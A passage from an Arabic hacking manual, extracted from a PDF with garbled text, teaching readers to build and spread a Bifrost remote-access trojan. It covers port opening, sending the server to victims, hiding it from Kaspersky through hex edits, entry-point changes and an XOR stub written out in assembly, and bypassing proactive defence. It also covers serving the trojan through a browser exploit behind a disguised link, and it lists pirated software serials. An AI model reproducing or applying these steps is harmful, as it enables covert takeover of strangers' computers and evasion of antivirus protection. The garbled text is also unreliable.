فتح منفذ في األجھزة مھما كان نوع الروتر

وذلك بالضغط على ايقونة اتصال الشبكة في خصائص االتصال ادخل اعدادت االتصال

ار خصائصبالزر االيمن بالماوس واخت

Page 39: المرجع الشامل في اختراق الاجهزة

ProTo MaN

39

Page 40: المرجع الشامل في اختراق الاجهزة

ProTo MaN

40

Page 41: المرجع الشامل في اختراق الاجهزة

ProTo MaN

41

قم بتكرير ھذه العملیة على عدد المنافذ التي تريد فتحھا وسیصلك التبلیغ إن شاء اهللا

Page 42: المرجع الشامل في اختراق الاجهزة

ProTo MaN

42

شرح برنامج البیفروست

Page 43: المرجع الشامل في اختراق الاجهزة

ProTo MaN

43

Page 44: المرجع الشامل في اختراق الاجهزة

ProTo MaN

44

تم انشاء السیرفراآلن البرنامجفي نفس مجلد ستجده

^_^بإرسال السیرفر إلى الضحیة وانتظر التبلیغ قم

إرسال السیرفر إلى الضحیة انتظر لحظات بعد

وسوف يصلك التبلیغ على النو آيبي

Page 45: المرجع الشامل في اختراق الاجهزة

ProTo MaN

45

اآلن تم دخول الضحیة

Page 46: المرجع الشامل في اختراق الاجهزة

ProTo MaN

46

Page 47: المرجع الشامل في اختراق الاجهزة

ProTo MaN

47

Page 48: المرجع الشامل في اختراق الاجهزة

ProTo MaN

48

Hexالھیكس التشفیر بتحرير قیم

Page 49: المرجع الشامل في اختراق الاجهزة

ProTo MaN

49

Page 50: المرجع الشامل في اختراق الاجهزة

ProTo MaN

50

Page 51: المرجع الشامل في اختراق الاجهزة

ProTo MaN

51

Page 52: المرجع الشامل في اختراق الاجهزة

ProTo MaN

52

Page 53: المرجع الشامل في اختراق الاجهزة

ProTo MaN

53

بعد تحديد القیم المكشوفة عبر الطريقة السابقة ، نقـوم اآلن بكتابة ھذه القیم في ورقة خارجیة أو مستند نـصي حتـى ال

ــساھا ــم .نن ــى ث ــدل عل ــي نع ــیكس لك ــامج الھ ــذھب لبرن ن .السیرفر ونقوم بتشفیره عن الكاسبر

Page 54: المرجع الشامل في اختراق الاجهزة

ProTo MaN

54

Page 55: المرجع الشامل في اختراق الاجهزة

ProTo MaN

55

قم بنفس العملیة لجمیع القیم المكشوفةاآلن تمكنت من تحديدھا التي

و بھذا انتھت عملیة تشفیر الباتش من الكاسبر قم بنفس العملیة مع بقیة الحمايات

Page 56: المرجع الشامل في اختراق الاجهزة

ProTo MaN

56

دخالالتشفیر بنقط اإلنقطة اإلدخال ھي سطر اول عملیة ينطلق منھا السیرفر وعند تغییرھا ستخدع بعض

.الحمايات

اول شي ھذه نتیجة السیرفر قبل التشفیر

Olly افتح السیرفر بالمنقح الشھیر االن وفي اول مرحلة

Page 57: المرجع الشامل في اختراق الاجهزة

ProTo MaN

57

اضغط ضغطتین على اي سطر

Page 58: المرجع الشامل في اختراق الاجهزة

ProTo MaN

58

االن سنقوم بادخال االوامر التالیةRETN RETN PUSH EBP MOV EBP,ESP SUB ESP,8

PUSH >>> و امامھا افست نقطة االدخال الحقیقیة PUSH >>> و امامھا افست ريتن االولى MOV EAX, >>> و امامھا افست ريتن الثانیة

JMP EAX

و كالتالي في حالتي انا ةو ستكون النتیج

push ebpاالن افست

احفضھا جیدا

Page 59: المرجع الشامل في اختراق الاجهزة

ProTo MaN

59

م بالعمل التاليثم ق

Page 60: المرجع الشامل في اختراق الاجهزة

ProTo MaN

60

Page 61: المرجع الشامل في اختراق الاجهزة

ProTo MaN

61

Page 62: المرجع الشامل في اختراق الاجهزة

ProTo MaN

62

Lord PEاالن ادخل برنامج

و اختر سیرفرك المعدل

push ebpاالن افست imageBaseنقص منھا

و تتحصل على نقطة االدخال الجديدة

Page 63: المرجع الشامل في اختراق الاجهزة

ProTo MaN

63

تخلصنا من كم حماية بسھولة شديدة

Page 64: المرجع الشامل في اختراق الاجهزة

ProTo MaN

64

التشفیر باكواد التشفیر

zone caveسنقوم بتوسیع ال في مرحلة اولى افتح سیرفرك باي محرر قیم ست عشري

انزل الى االسفل وقم باضافة اي قیمة تعجبك مع اخذ الحیطة

االن احفظ سیرفرك الجديد

procdumpو افتحه ببرنامج

Page 65: المرجع الشامل في اختراق الاجهزة

ProTo MaN

65

psizeاالن سنقوم بتغییر الــ القیمة الجديدة التي ستخذھا كالتالي

psize+ ا بالست العشري القیمة الي اضفناھ

فیكون لنا كالتالي data segو بما ان السیرفر يمكن اعادة كتابته ويحوي 62010 = 200 + 61810

يمكن ادخال قیمة اصغر من المطلوبة بقلیل

فیكون لدينا61810 + 150 = 61960

Page 66: المرجع الشامل في اختراق الاجهزة

ProTo MaN

66

ollyاالن نفتح السیرفر بالمنقح

وامر فیھا و ننزل الى المناطق الي يمكن وضع اال و نكتب االوامر التالي

<<<Mov ecx, افست نقطة االدخال–افست اول سطر << Mov eax, افست نقطة االدخال

Xor byte [eax],0c In eax

Dex ecx <<< Jnz افست كود التشفیرxor byte

<<< Pushافست نقطة االدخال RETN

و بكذا انتھینا

في مثالي انا ستكون كالتالي

االن نحفظ العمل كما تعلمنا في الدرس السابق االن نقطة االدخال الجديدة ستكون

image Base –افست اول امر 7777 و في حالتي انا يتكون كذا

Page 67: المرجع الشامل في اختراق الاجهزة

ProTo MaN

67

ollyاالن نعود لفتح السیرفر من جديد ببرنامج break pointاعمل

F9ب ثم مثل ما في الصورة

Page 68: المرجع الشامل في اختراق الاجهزة

ProTo MaN

68

ر و بھذه الحركة طبقنا التشفی

Page 69: المرجع الشامل في اختراق الاجهزة

ProTo MaN

69

و ھذي نتیجة التشفیر على البیفروست

Page 70: المرجع الشامل في اختراق الاجهزة

ProTo MaN

70

تخطي الدفاع االستباقي لدى الكاسبر

تقوم الفكرة على ادخال كود تغییر الوقت (y)تعطل الكاسبر ويشتغل السیرفر عادي يكي

ollyاول شي افتح السیرفر ب واذھب للمنطقة المعتادة وقم بادخال االكواد التالیة

Push esp Push ebp Push edi Pushad

Push esp Call 7c80a7d4

Mov dword ptr ss :[esp],807c2 Push eax

Call 7c855921 Popad

Pop esi Pop edi

Pop ebp Pop esp

<<< Jmpنقطة االدخال الحقیقیة

نقطة االدخال الجديدة image Base –افست اول امر

تكون عندنا ھكذا00007792

Page 71: المرجع الشامل في اختراق الاجهزة

ProTo MaN

71

Page 72: المرجع الشامل في اختراق الاجهزة

ProTo MaN

72

المملثغرات المتصفح بالتفصیل

سنعمل ھوست مجاني لنرفع علیهاآلن الثغرة الخاصة بالمتصفح فیما بعدملف

أفضل موقع يعطي مساحة مجانیةھذا

php.index/community/com.freewebtown.www://http

Page 73: المرجع الشامل في اختراق الاجهزة

ProTo MaN

73

Page 74: المرجع الشامل في اختراق الاجهزة

ProTo MaN

74

Page 75: المرجع الشامل في اختراق الاجهزة

ProTo MaN

75

Page 76: المرجع الشامل في اختراق الاجهزة

ProTo MaN

76

Page 77: المرجع الشامل في اختراق الاجهزة

ProTo MaN

77

Page 78: المرجع الشامل في اختراق الاجهزة

ProTo MaN

78

تحمیل السیرفر على الموقعبعد

بنسخ الرابط لنضغه في ملف الثغرةقم

البحث في المنتديات المختصة عن ثغرة متصفحبإمكانك

شيء تكون مو مكشوفه وجديدةاھم

Page 79: المرجع الشامل في اختراق الاجهزة

ProTo MaN

79

Page 80: المرجع الشامل في اختراق الاجهزة

ProTo MaN

80

Page 81: المرجع الشامل في اختراق الاجهزة

ProTo MaN

81

Page 82: المرجع الشامل في اختراق الاجهزة

ProTo MaN

82

Page 83: المرجع الشامل في اختراق الاجهزة

ProTo MaN

83

Page 84: المرجع الشامل في اختراق الاجهزة

ProTo MaN

84

اذھب للمتصفح وادخل على الموقع التالي لتشفیر رابط السیرفراآلن

tk.dot://phtt

Page 85: المرجع الشامل في اختراق الاجهزة

ProTo MaN

85

Page 86: المرجع الشامل في اختراق الاجهزة

ProTo MaN

86

Page 87: المرجع الشامل في اختراق الاجهزة

ProTo MaN

87

Page 88: المرجع الشامل في اختراق الاجهزة

ProTo MaN

88

Page 89: المرجع الشامل في اختراق الاجهزة

ProTo MaN

89

Page 90: المرجع الشامل في اختراق الاجهزة

ProTo MaN

90

Page 91: المرجع الشامل في اختراق الاجهزة

ProTo MaN

91

وزع الرابط واستمتع بالضحايااآلن

و بھا انھیت عملك ولن يیشك الضحیة في الرابط النه يبدو كموقع

Page 92: المرجع الشامل في اختراق الاجهزة

ProTo MaN

92

المدموجة البرامج تحلیل

ومع لیلهتحيقوم ب كیف أغلب الھكرز ت انه عندما ينزل برنامج مدموج ال يعرفظالح

ھذا الموضوع سیكون الكل قادرًا على تحلیل أي برنامج مدموج ان شاء اهللا

hexworkshop برنامج عن تحلیل سیرفر البويزن - 1

:التالي الرابط على اضغط البرنامج على للحصول

html.10004918-4_2352-3000F/Workshop-FHex/com.download.www://http

Page 93: المرجع الشامل في اختراق الاجهزة

ProTo MaN

93

Page 94: المرجع الشامل في اختراق الاجهزة

ProTo MaN

94

Page 95: المرجع الشامل في اختراق الاجهزة

ProTo MaN

95

* Valid Serials * * * * By PROTO * **********************

9990488-811772-D336 9990488-046040-F583 9990488-660913-C2FC 9990488-881767-FBE2 9990488-767400-580F

Page 96: المرجع الشامل في اختراق الاجهزة

ProTo MaN

96

تحلیل سیرفر البیفروست -2

antifrost برنامج المستخدم في تحلیل السیرفرالبرنامج

: التالي الرابط اتبع البرنامج على للحصول

rar.FAntiFrost/FBifrost/Fanalyse/02Fproto/com.freewebtown.www://http

Page 97: المرجع الشامل في اختراق الاجهزة

ProTo MaN

97

Page 98: المرجع الشامل في اختراق الاجهزة

ProTo MaN

98

extract bifrost برنامج : التالي الرابط اتبع البرنامج على للحصول

52/Fbifrost/FBifrost/Fanalyse/02Fproto/com.freewebtown.www://httprar.textrac0

Page 99: المرجع الشامل في اختراق الاجهزة

ProTo MaN

99

التحلیل عن طريق العملیات - 3

rootkit برنامج

: التالي الرابط اتبع البرنامج على للحصول

exe.FRootkit/FRootkit/Fanalyse/02Fproto/com.freewebtown.www://http

Page 100: المرجع الشامل في اختراق الاجهزة

ProTo MaN

100

فك الدمج - 4

Page 101: المرجع الشامل في اختراق الاجهزة

ProTo MaN

101

plugin PE EXTRACT zip.FPEExtract/Foher/Fanalyse/02Fproto/com.freewebtown.www://http

exeinfo برنامجrar.info520/Fexe/Foher/Fanalyse/02Fproto/com.freewebtown.www://http

Page 102: المرجع الشامل في اختراق الاجهزة

ProTo MaN

102

الخاتمة

كانت ھذه معلومات ربما أنھا ألول مرة تنشر في جمیع المواقع العربیة وھي مھمة .لكل ھكر يريد احتراف اختراق االجھزة

ه المعلومات فیرجى عدم وانا أبري ذمتي أمام اهللا من أي استخدام خاطيء لھذ .التطبیق ضد اخوانكم المسلمین

تم بحمد اهللا

ھـ2/1429 /411/02/2008